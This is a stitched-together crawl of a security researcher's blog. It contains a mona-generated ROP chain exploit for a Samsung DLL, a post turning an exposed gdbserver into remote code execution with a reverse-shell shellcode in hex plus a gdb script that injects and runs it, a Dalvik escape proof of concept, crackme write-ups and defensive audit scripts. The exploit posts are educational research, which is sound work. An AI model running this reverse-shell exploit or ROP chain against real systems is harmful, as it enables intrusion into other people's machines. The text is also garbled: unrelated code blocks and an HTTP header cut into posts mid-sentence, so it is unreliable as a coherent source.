 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
"""
import struct


def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # &
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    ]
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)


# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1
# (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)
```

## Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that's why it gives great feedback in the form of [*rop.txt*](/wp-posts/samsung-rop.txt) and [*rop_suggestions.txt*](/wp-posts/samsung-rop_suggestions.txt).

Now if you look closely at the generated ROP chain, while comparing it to the notes about the required states of the registers for VirtualAlloc, you'll notice that some gadgets have to be shuffled around, and some are not correct yet.

Let's analyze each register top-to-bottom from the provided register list in order to see if they're all set correctly. First we start with *eax*.

Eax is set to 0x90909090 at the end. However, the same gadget also sets *ebp* to an invalid value; register dependencies are something that mona doesn't handle very well yet, unfortunately. Anyway, it's easier to replace this gadget than to shuffle it around. I ended up replacing it by a "pop ecx ; retn" and a "mov eax, ecx ; retn" gadget, and moving it to an earlier place in the ROP chain where ecx has not yet been assigned its final value. Ecx itself is already correct; it'll be set to 0x40 using the 'original' "pop ecx ; retn" gadget.

Edx has to become 0x1000, for which mona has decided to use *ebx* as intermediate register. We can remove the first gadget that sets ebx, as its value is overwritten right away when executing the next gadget. (Which sets ebx as well.)

Now mona handles *esp* for us, so we don't have to do anything there. The next register, *ebp*, however, does need some extra work. The description tells us it needs to point to a "jmp esp" gadget, but because there's no such gadget in our DLL mona sort of failed silently. (The comment doesn't show an error message, but instead shows something that doesn't make much sense.)

Given there's no "jmp esp" in our code, nor a direct "push esp ; retn" gadget, we have to play around with mona some more.. We run the following command which is, again, documented [here](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/), and find the following gadget.

```
!mona findwild -s "push esp#*#retn" -m wincrt
0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]
```

## Finishing up

So yeah, that'll do for us :) Patch the 0x00000000 value with "base_wincrt + 0x00009558" and *ebp* is good to go. Finally, *esi* and *edi* have been handled correctly by mona. (Note that we don't have to worry about the value of eax in our custom "jmp esp" gadget, as this is executed right after the call to VirtualAlloc, and literally jumps to our shellcode.)

Having fixed the ROP chain, our final ROP chain including some MessageBox() shellcode, wrapped into a C file, looks like [the following](/wp-posts/samsung.c). (Woah, somebody added C dumping support to mona yesterday!) In case you're interested in the binary, to be run when the DLL is loaded into memory, it can be found [here](/wp-posts/samsung.exe).

## Conclusion

This was the first time I tried mona and I'm genuinely happy about it. Very easy to use and it did the job for me :) Ah yeah, so anyone with this particular Samsung software on his computer.. how do I even.. I guess it's just "another one of those".

# Turning arbitrary GDBserver sessions into RCE

Posted on December 2, 2013 by jbremer
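The property that makes WinCRT.dll a problem in the post is that it loads at a fixed ImageBase without opting into ASLR. As an added example (not the post's or mona's code), here is a PE header check a defender can run over the vendor DLLs on a machine to find modules with that property; the two PE images it is tested on are constructed stand-ins, not the real WinCRT.dll.

```python
"""
Added example (not from the post or from mona): read a PE file's headers and
report ImageBase plus the mitigation opt-ins, to audit DLLs that get loaded
into every process for a predictable load address.
"""
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001            # no relocations: cannot be rebased
IMAGE_FILE_DLL = 0x2000
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in


def pe_hardening(data):
    """Parse DOS, COFF and optional headers; return base address and flags."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    coff = e_lfanew + 4
    machine, _nsections, _, _, _, opt_size, file_chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: 32-bit ImageBase at optional offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:      # PE32+: 64-bit ImageBase at optional offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "machine": machine,
        "is_dll": bool(file_chars & IMAGE_FILE_DLL),
        "relocs_stripped": bool(file_chars & IMAGE_FILE_RELOCS_STRIPPED),
        "image_base": image_base,
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def predictable_base(info):
    """True when the module will sit at its ImageBase: it never opted into
    ASLR, or its relocations were stripped so the loader cannot move it."""
    return (not info["dynamic_base"]) or info["relocs_stripped"]


def build_sample_pe32(image_base, dll_chars, file_chars=IMAGE_FILE_DLL):
    """Constructed minimal PE32 (headers only, no sections) for testing."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, file_chars)  # i386
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-ins: one like the post's DLL (fixed 0x10000000, no ASLR),
# one that opted into both ASLR and DEP.
SAMPLE_NO_ASLR = build_sample_pe32(0x10000000, 0x0000)
SAMPLE_HARDENED = build_sample_pe32(0x10000000, 0x0140)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            info = pe_hardening(f.read())
        print("%s: base=0x%08x ASLR=%s NX=%s predictable_base=%s" % (
            path, info["image_base"], info["dynamic_base"],
            info["nx_compat"], predictable_base(info)))
```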
Today we'll see how we can turn an arbitrary GDBserver remote debugging session into remote code execution. First of all, let's assume gdbserver is run using the following command. We will also assume that the target architecture is Linux/x86, but you can port the technique to other architectures as needed.

```bash
$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
```

What happens is that gdbserver will serve as many remote debugging sessions as possible while it's running. That is, we can have as many remote debugging sessions as we like, until the gdbserver is killed (but only one at a time.) This makes sense, because if we are debugging a target, then we don't want to restart gdbserver every time we hit "run" in gdb.

Let's assume one were to run gdbserver in a screen, to prevent accidental connection resets resulting in losing the gdbserver session (assuming we're ssh'ing into a remote server.) Exactly this happened to me – I recently found out that there were still two (of my) gdbservers running in a screen from when we were playing a CTF, almost *two months* ago.

Now anyone with the ip address and port number can attach to your gdbserver by doing the following.

```
$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
..
[Inferior 1 (process 42) exited normally]
```

In order not to make the RCE too easy, we're going to assume that we don't have any symbols of the remote binaries, and that all addresses are ASLR'd. In other words, educated guessing of "main" is useless, and we won't be able to do arbitrary function calls during debugging such as the following.

```
(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.
```

However, if we enter a breakpoint at an invalid address and run the debuggee, we get an error right before executing the very first instruction of the process. This looks roughly like the following :)

```
(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Warning:
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.

(gdb) info reg eip
eip            0xf7fe0850          0xf7fe0850
```

At this point the debuggee has been executed, and we're able to inspect and modify its state. We continue by removing our earlier breakpoint. Now it's time for the fun part.

## Reverse Shell Shellcode

After a bit of googling, I stumbled upon the [following shellcode](http://www.exploit-db.com/exploits/25497/). This shellcode connects to an ip address and port of your choosing, and executes /bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat listening on the remote ip address and port, then it'll get a connection request upon execution of the shellcode, and we can use it to run arbitrary shell commands on the shellcode's machine, as if we had shell access. After an initial test, this shellcode seemed to work on my x86_64 machine running a 32-bit application. However, there's a small problem with this shellcode. If we look closely at the shellcode, we notice the following.

```
 804807b:   31 db       xor    ebx,ebx
 804807d:   b3 02       mov    bl,0x2
..
 804808a:   fe c3       inc    bl
..
 8048098:   b1 03       mov    cl,0x3

0804809a <dupfd>:
 804809a:   fe c9       dec    cl
 804809c:   b0 3f       mov    al,0x3f
 804809e:   cd 80       int    0x80        ; system call
 80480a0:   75 f8       jne    804809a
```

Investigating this system call further, we see that this is the [*dup2* system call](http://syscalls.kernelgrok.com/). However, the ebx register, or *old_fd*, seems to be constant here, namely three. (I figured this out while brushing my teeth..) This is the default fd if you open your first file descriptor in a program, which is something we cannot assume, and is definitely not the case when running the debuggee under gdbserver. (E.g., this shellcode fails if you open a file or socket before running it, because the fd of the socket allocated by our shellcode will be four for example, instead of three.)

If we look further, we see that the esi register contains the fd number returned from the *socket* system call. (Actually, this is the *socketcall* system call with *SOCKOP_socket* as operation, but that's a minor detail specific to Linux/x86.)

```
 8048075:   cd 80       int    0x80        ; socket()
 8048077:   89 c6       mov    esi,eax     ; esi = fd
..
 804808e:   6a 10       push   0x10        ; sizeof(sockaddr_in)
 8048090:   51          push   ecx         ; sockaddr_in *
 8048091:   56          push   esi         ; fd
 8048092:   89 e1       mov    ecx,esp
 8048094:   cd 80       int    0x80        ; connect()
```

Long story short, we want to preserve esi before the *connect* system call, and store it into ebx after the system call. Thus ebx will contain the fd of our socket, and the system calls to *dup2* will duplicate the correct fd into stdin, stdout, and stderr. The following snippet shows the updated shellcode. This is the shellcode that we're going to use.

```
 8048092:   89 e1       mov    ecx,esp
+                       push   esi         ; push fd
 8048094:   cd 80       int    0x80        ; connect()
+                       pop    ebx         ; pop fd into ebx
 8048096:   31 c9       xor    ecx,ecx
 8048098:   b1 03       mov    cl,0x3
```

## Running the Shellcode

All we have left to do is to patch the correct ip address and port into the shellcode, namely that of our listening netcat instance (e.g., running "nc -vvv -l 9001" on your favourite linux box), overwrite eip with the shellcode, and finally, run it.

For my exploit I'm using gdb's Python bindings, as initially I had another technique in mind, which required a bit more scripting. Following is the final part of the code which generates the shellcode, overwrites it onto eip, and executes it. We have two *continue* statements at the end, as the shellcode will *execv* into /bin/sh, after which we'll get an error that gdbserver can't read the memory of eip anymore, so we have to instruct gdbserver to continue past that error.

```python
# Python 2, as embedded in gdb at the time (run with: gdb -x gdbservrce.py).
import socket
import struct

import gdb


def reverse_shell((ip, port)):
    """Modified x86 reverse shell"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = \
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
        'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80'
    # Patch the listener's port and ip into the placeholders in the shellcode.
    return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)


# netcat is the (ip, port) tuple of the listener, defined earlier in the script.
for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))

gdb.execute('continue')
gdb.execute('continue')
```

## Final Exploit

The final exploit code can be found [here](https://github.com/jbremer/gdbservrce).

Execution of the code may look like the following. We'll need three shells. (Optionally on different servers – do as you like.)

### Shell 1

```bash
$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
..
```

### Shell 2

```bash
$ nc -vvv -l 31338
..
```

### Shell 3

```bash
$ vim gdbservrce.py    # Patch the ip addresses
$ gdb -x gdbservrce.py
..
```

### Enjoy Shell!

Now if we go back to Shell #2, we'll see the following, and can run arbitrary shell commands.

```
skier@box:~$ nc -vvv -l 31338
Connection from 1.1.1.1 port 31338 [tcp/*] accepted
id
uid=1010(skier) gid=1011(skier) groups=1011(skier)
```

## Conclusion

This is a funny technique which basically tells you not to have gdbservers running around :)

# Dalvik Research

Posted on October 23,
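The lesson of the post is the forgotten gdbserver bound to 0.0.0.0. As an added example (not part of the post or of gdbservrce), here is the audit a defender would run on their own hosts: parse `ss -ltnp` output and flag gdbserver listeners, separating those bound to every interface from loopback-only ones. The sample output below is constructed; pids and ports are made up.

```python
"""
Added example (not from the post): find gdbserver instances that are still
listening on this host, and flag the ones bound to all interfaces.
"""
import re
import subprocess

# Constructed sample of 'ss -ltnp' output (pids and ports made up).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=902,fd=7))
LISTEN  0       1       0.0.0.0:1337         0.0.0.0:*          users:(("gdbserver",pid=4242,fd=3))
LISTEN  0       1       127.0.0.1:2345       0.0.0.0:*          users:(("gdbserver",pid=4243,fd=3))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=731,fd=4))
LISTEN  0       1       *:1338               *:*                users:(("gdbserver",pid=4244,fd=3))
"""

# Binds that accept connections from other hosts (IPv4 and IPv6 wildcards).
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}
# One ("name",pid=N,fd=M) entry inside the users:(...) column.
PROCESS_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


def split_addr_port(field):
    """'0.0.0.0:1337' -> ('0.0.0.0', 1337); also handles '[::]:22' and '*:*'."""
    addr, _, port = field.rpartition(":")
    return addr, (None if port == "*" else int(port))


def parse_listeners(ss_output):
    """Yield one dict per process holding a LISTEN socket."""
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 6 or cols[0] != "LISTEN":
            continue                      # header line or socket without process info
        addr, port = split_addr_port(cols[3])
        for name, pid in PROCESS_RE.findall(cols[5]):
            yield {"process": name, "pid": int(pid), "addr": addr, "port": port}


def exposed_gdbservers(ss_output):
    """gdbserver listeners reachable from other hosts (wildcard bind)."""
    return [l for l in parse_listeners(ss_output)
            if l["process"] == "gdbserver" and l["addr"] in WILDCARD_ADDRS]


def local_gdbservers(ss_output):
    """gdbserver listeners bound to a specific address such as loopback."""
    return [l for l in parse_listeners(ss_output)
            if l["process"] == "gdbserver" and l["addr"] not in WILDCARD_ADDRS]


if __name__ == "__main__":
    # The Process column is only shown for sockets you own, or for all as root.
    out = subprocess.check_output(["ss", "-ltnp"]).decode()
    for l in exposed_gdbservers(out):
        print("gdbserver pid %d listens on %s:%s for anyone on the network"
              % (l["pid"], l["addr"], l["port"]))
    for l in local_gdbservers(out):
        print("gdbserver pid %d still listening on %s:%s"
              % (l["pid"], l["addr"], l["port"]))
```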
2013 by jbremer

Over the past couple of months I've been doing some research with regards to the Dalvik Virtual Machine, which is Android's Java Virtual Machine implementation. Long story short, most Android applications are written in Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and various applications, with a focus on their obfuscation techniques (which make analysis harder.) This research was presented at a couple of conferences.

[Back in June](http://jbremer.org/automated-deobfuscation-of-android-applications/) I already posted my slides for my [AthCon](http://athcon.org/) talk, which focused on deobfuscation. Then [a couple of weeks ago](https://twitter.com/rchiossi/status/386542792094519296), I did a similar talk together with [Rodrigo Chiossi](https://twitter.com/rchiossi) at [H2HC](http://h2hc.com.br/h2hc/pt/), featuring new and updated content, with a bit more focus on some of the techniques involved in creating new Dex files.

Finally I did a [talk](http://2013.hack.lu/index.php/List#Jurriaan_Bremer_-_Abusing_Dalvik_Beyond_Recognition) yesterday at [Hack.lu](http://2013.hack.lu/index.php/Main_Page), focusing on the Dalvik Virtual Machine itself. In this talk I presented an *"undocumented feature"* which I found in the way Android verifies Dex files, allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not allowed; all code must normally be hardcoded and will be verified upon installation.) Following are the [slides](/wp-posts/AbusingDalvikBeyondRecognition.pdf) and the [Proof of Concept DvmEscape](/wp-posts/DvmEscape.apk) application.

As explained during the presentation, when running this application on your phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by clicking on the "Run Dalvik" button. On the 30th slide of the presentation one can find two examples of valid Dalvik Bytecode, which, when run, will return with a fancy number. Unfortunately the dalvik.py disassembler mentioned in the slides is currently not open source, but for some more documentation on the Dalvik Bytecode there's always the [Dalvik Bytecode reference](http://source.android.com/devices/tech/dalvik/dalvik-bytecode.html).

## Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation you'll have to do a couple of things:

- Install [CalcExe.apk](/wp-posts/CalcExe.apk) on the device
- Get the [adb_type.py](/wp-posts/adb_type.py) script, which "types" a string into the emulator
- Finally, type [payload.txt](/wp-posts/payload.txt) to the *DvmEscape* application, with the following command.

```bash
$ python adb_type.py $(cat payload.txt)
```

Note that typing the bytecode in to the emulator (or phone?!) takes roughly a minute. (No, there appears to be no support for using the clipboard with the emulator.) After that, just click on the button and calc should pop :)

For more information or questions, feel free to reach me at my new email address; [mail](mailto:me@jbremer.org).

# Dirkjan Email Feed

Posted on September 1, 2013 by jbremer

## Dirkjan Strip Mailing List

This blogpost is mainly for **Dutch** (speaking) people (although I'll still keep the blogpost in English.)
As I'm sure you're all well-aware, Dirkjan is an [awesome](http://en.wikipedia.org/wiki/DirkJan) Dutch [comic](http://nl.wikipedia.org/wiki/DirkJan).

A couple of weeks ago I stumbled upon the [weekly feed](http://www.veronicamagazine.nl/entertainment/strips) from **Veronica**. Naturally, not wanting to check the website every week, I came up with a very simple **Dirkjan Feed** in the shape of a Mailing List. Of course this is not so much a mailing list, as it's mostly one-way traffic, but it's a fun way to keep up-to-date with **two Dirkjans a week**!

## Subscribe

Having said that, one can subscribe [here](http://jbremer.org/mailman/listinfo/dirkjan_jbremer.org) simply by filling out the **email address**. Other information is optional and not very interesting. (Yes, the website is a bit ugly – it's the default mailing list manager.)

By subscribing you agree to being awesome (given you're interested in reading Dirkjan) and the legal disclaimer on the bottom of this blogpost.

## Subscription

As I've only just set up the mailing list, I do not know exactly when new comics will arrive, but it looks like it will be every Tuesday. Please, **when subscribed**, do **not panic** – the comics will come eventually! (Just **wait**!)

## Legal stuff

I'm not affiliated with Veronica in any way. Any damage done through this Dirkjan Email Feed is at your own responsibility. I do not intend to damage Veronica in any way.

That's all, and have fun reading Dirkjan. Dirkjan is awesome :)

# Darm Update – More ARMv7, More Thumb

Posted on August 16, 2013 by jbremer

Darm is an [ARMv7](http://jbremer.org/darm) [disassembler](https://github.com/jbremer/darm) in C.
This blogpost is just a small update about the new stuff in darm from over the past couple of months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, Darm has recently gained support for the Thumb instruction set. Those of you familiar with ARMv7 know that ARMv7 has two modes, namely ARMv7 and Thumb. ARMv7 contains pretty much all the instructions you'd ever need, but Thumb is a small subset of the most used ARMv7 instructions, and Thumb instructions are only 16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless to say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the equivalent function for disassembling ARMv7 instructions. Furthermore, the two instruction set modes share the same data structure, darm_t, hence it is easily possible to write generic analysis routines without having to worry whether you're analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2 function; for more information on that, read further.)

    #include <stdint.h>

    typedef struct _darm_t {
        ...
    } darm_t;

    // disassemble an armv7 instruction (one 32-bit word)
    int darm_armv7_disasm(darm_t *d, uint32_t w);

    // disassemble a thumb instruction (one 16-bit word)
    int darm_thumb_disasm(darm_t *d, uint16_t w);

    // disassemble a thumb2 instruction (two 16-bit words)
    int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing too spectacular, but it's still improving as I find bugs and stumble upon new instructions.

Coming up: Thumb2 support

Currently I'm working on getting support for the Thumb2 instruction set as well.
As the Thumb instruction set is fairly limited with regards to the instructions that it can handle, as it's only 16 bits in size rather than 32 bits, there's also the Thumb2 extension. Thumb2 features almost all (except for maybe a handful of instructions) of the instructions which are also available in the ARMv7 instruction set, hence allowing the optimized Thumb instructions to be mixed with Thumb2 instructions, which are, like ARMv7 instructions, 32 bits in size.

Having said that, if there are requests for instructions which you'd like to see sooner rather than later, please do contact me. At first I aim to support, let's say, 90% of the binaries while keeping the amount of implemented instructions to a "minimum." That is, I'll focus on the most used Thumb2 instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, the instruction will be executed as an ARMv7 instruction whenever the address is 4-byte aligned, and executed as either a Thumb or a Thumb2 instruction, depending on its encoding, when the least significant bit is set. That is, when the address is not 4-byte aligned, but instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer), then the instruction is decoded as being either Thumb or Thumb2.

The instruction is either decoded as Thumb or Thumb2 depending on a couple of the most significant bits. When decoded as Thumb, one 16 bit word is fetched and executed. When decoded as Thumb2, a second 16 bit word is fetched and the instruction is decoded as if it were a 32 bit word.

At the following lines of code (https://github.com/jbremer/darm/blob/f43765295cc560727bc8edeb911c80a04d254e92/thumb.c#L311) we can see the comparison of the upper 5 bits of the first 16 bit word.
When the upper five bits equal either b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a Thumb2 instruction. Otherwise it's a Thumb instruction.

Also note that at the moment there are two separate functions to disassemble Thumb and Thumb2 instructions, but don't worry, in the future there'll be a nice wrapper around them :)

Contact

For questions etc., you know where to find me (https://twitter.com/skier_t, jurriaanbremer@gmail.com).

Posted in Uncategorized

Solving ZCrackme#2: A Custom Emulator Approach
Posted on August 7, 2013 by jbremer
Due to my non-existent experience with using gdb under ARMv7, I decided to solve this challenge (the ZCrackme #2 Challenge, http://blog.zimperium.com/arm-crackme-competition/) using a minimal ARMv7 emulator (https://github.com/jbremer/darmu) based on my ARMv7 disassembler (https://github.com/jbremer/darm). (The original challenge can be found at /wp-posts/zcrackme-orig.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure as the first ZCrackme challenge (not sure if there's a blogpost about this one though.) Basically the ELF header is messed up, sections are missing, and the Entry Point points to a page filled with zeroes.

INIT_ARRAY

Upon further inspection, using readelf -a zcrackme2, we find that the binary features the so-called preinit-array, init-array, and fini-array dynamic sections. These dynamic sections in fact represent a table of function addresses which are called right before calling the real Entry Point (in the case of preinit-array and init-array) and called after calling the real Entry Point (in the case of fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the init-array points to a real address, loc_B0D8.
(The other table arrays, preinit-array and fini-array, are filled with zeroes and -1's, which are nops – as in, these are not really called.)

We conclude that the actual entry point, or, the code that will be executed first, is located at this (loc_B0D8) address. From analyzing this routine in IDA Pro, we see some sort of decryption loop which overwrites some memory. Finally, after executing said decryption loop, an interesting system call is performed, namely #0xf0002. We find that this system call represents __clear_cache (https://code.google.com/p/android/issues/detail?id=1803).

__clear_cache

Basically, before the decrypted code can be executed, the code cache first has to be cleared for the particular address range in order to make sure that, when it is being executed, the new code will be executed, rather than any remaining code in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in the decrypted code. Which, in turn, does some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five times. One of these "decryptions" in fact zeroes the first 100 bytes of the ELF header. As our goal is to dump a decrypted version of the crackme binary, this ELF header corruption does not help us (as IDA Pro wouldn't understand the binary anymore.)

Reconstructing a Decrypted Binary

As decryption is followed by clearing the cache each time, we dump a new binary each time the cache is cleared. We do this by applying the changes to a copy of the original binary. That is, we read the decrypted data from emulator memory and write it over the corresponding region of our original binary's buffer.
We do this for each decryption, except for the one iteration where the ELF header is zeroed out. (Note: the __clear_cache system call takes the starting address as first parameter and the end address as second parameter, hence it is trivial for us to find out which chunks of memory have been decrypted.)

Scripting the Emulator

The following script (/wp-posts/zcrackme.py), although a bit messy, represents the code to dump the binary a couple of times, which results in the final binary we're interested in. The unpacked binary can be found at /wp-posts/zcrackme-unpacked. (Note that this unpacked binary may be inaccurate with regards to global variables etc. that have been updated during runtime but are not reflected in this version of the binary.)

Having successfully dumped the unpacked binary, it is now time for some static analysis on this binary. Do note that our emulator (https://github.com/jbremer/darmu) should run fine on Windows and Linux (with a 32bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4, which is the function where the real stuff is happening (argc/argv parsing, that is.)

There are a couple of odd text messages which will be printed whenever incorrect information is entered on the commandline. Finally, we find some interesting function calls, one of which is to sub_8638, which seems to decrypt the string buffer that can be found at byte_9C35, and another function which does a custom strcmp() against the argument on the commandline.

The string at byte_9C35 is decrypted by xor'ing with 0x0d (decrypted to a buffer on the stack by sub_8638), resulting in the string ZenCracking.
That said, we've solved the challenge.

Conclusion

In case somebody has a working gdb for ARMv7 setup, this challenge is probably pretty easy (i.e., step through the various decryption iterations, and try to find the custom strcmp.) However, I had fun implementing the simple ARMv7 emulator, which is in fact pretty tricky, with all the conditional stuff going on.

Now a harder crackme? Let's hope the next one does not involve xor "encryption" :p Zimperium's response was, however, that having gotten to the xor-decryption part already shows enough knowledge and understanding of ARMv7, to which I agree :)

Posted in Uncategorized
Port 443
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 11:17:38 GMT
Server: Apache
X-Pingback: http://jbremer.org/xmlrpc.php
Content-Length: 96004
Content-Type: text/html; charset=UTF-8

Development & Security | By Jurriaan Bremer @skier_t

Revamped VMCloak 0.3
Posted on October 5, 2015 by jbremer
VMCloak 0.3: Totally revamped & Office support

To quickly summarize - VMCloak is a tool for automatically creating, cloning, and cloaking Virtual Machines to be used for Cuckoo Sandbox.

Earlier this year I released VMCloak 0.2 (http://jbremer.org/vmcloak2/). Now the time has come for the next release, 0.3. Most notable about this release is the revamped command-line usage, the improvements with regards to installing dependencies in the Virtual Machine, and the latest dependency, Office 2007. Thanks to LookingGlass Cyber Solutions (https://lgscout.com/) for supporting the development towards this release, including the Microsoft Office 2007 integration.

So what about it?

The new command-line interface feels a bit more hipster and less obtuse compared to how its usage used to be. Most importantly, setting up a Virtual Machine is no longer a one-shot action. Instead there are now a couple of different subcommands, each to fulfill its own task. In addition to that the new VMCloak version utilizes the new Cuckoo Agent (https://github.com/jbremer/agent) – it is less Cuckoo-specific and features more general purpose uses, allowing easier communication between the VM and the various VMCloak subcommands.

The subcommands.

As a few new commands are now available it does make sense to elaborate on them a little bit. So here goes.
Note that all commands can be run either by calling vmcloak-xyz or vmcloak xyz on the command-line.

vmcloak-init is the new command to initialize a new Virtual Machine. One can specify a couple of flags, but the most important one is whether this is going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7 whether it will be 32-bit or 64-bit (32-bit being the default).

So to get started we can run the following command to create a new 64-bit Windows 7 VM. Note that this will be a VM internal to VMCloak – it can not be used right away in Cuckoo. For Windows XP setups a serial key is also required; on Windows 7 a serial key is optional (by default a dummy key provided by Microsoft is used). And also, just like before (http://jbremer.org/vmcloak2/) you still have to mount the Windows ISO file and set up vboxnet0.

    # Install the latest vmcloak.
    sudo pip install vmcloak --upgrade

    # Mount the Windows 7 Installer ISO.
    sudo mkdir -p /mnt/win7
    sudo mount -o loop,ro win7.iso /mnt/win7

    # Ensure the hostonly adapter is up.
    vmcloak-vboxnet0

    # Actually initialize the 64-bit Windows 7 VM.
    vmcloak init --win7x64 seven0

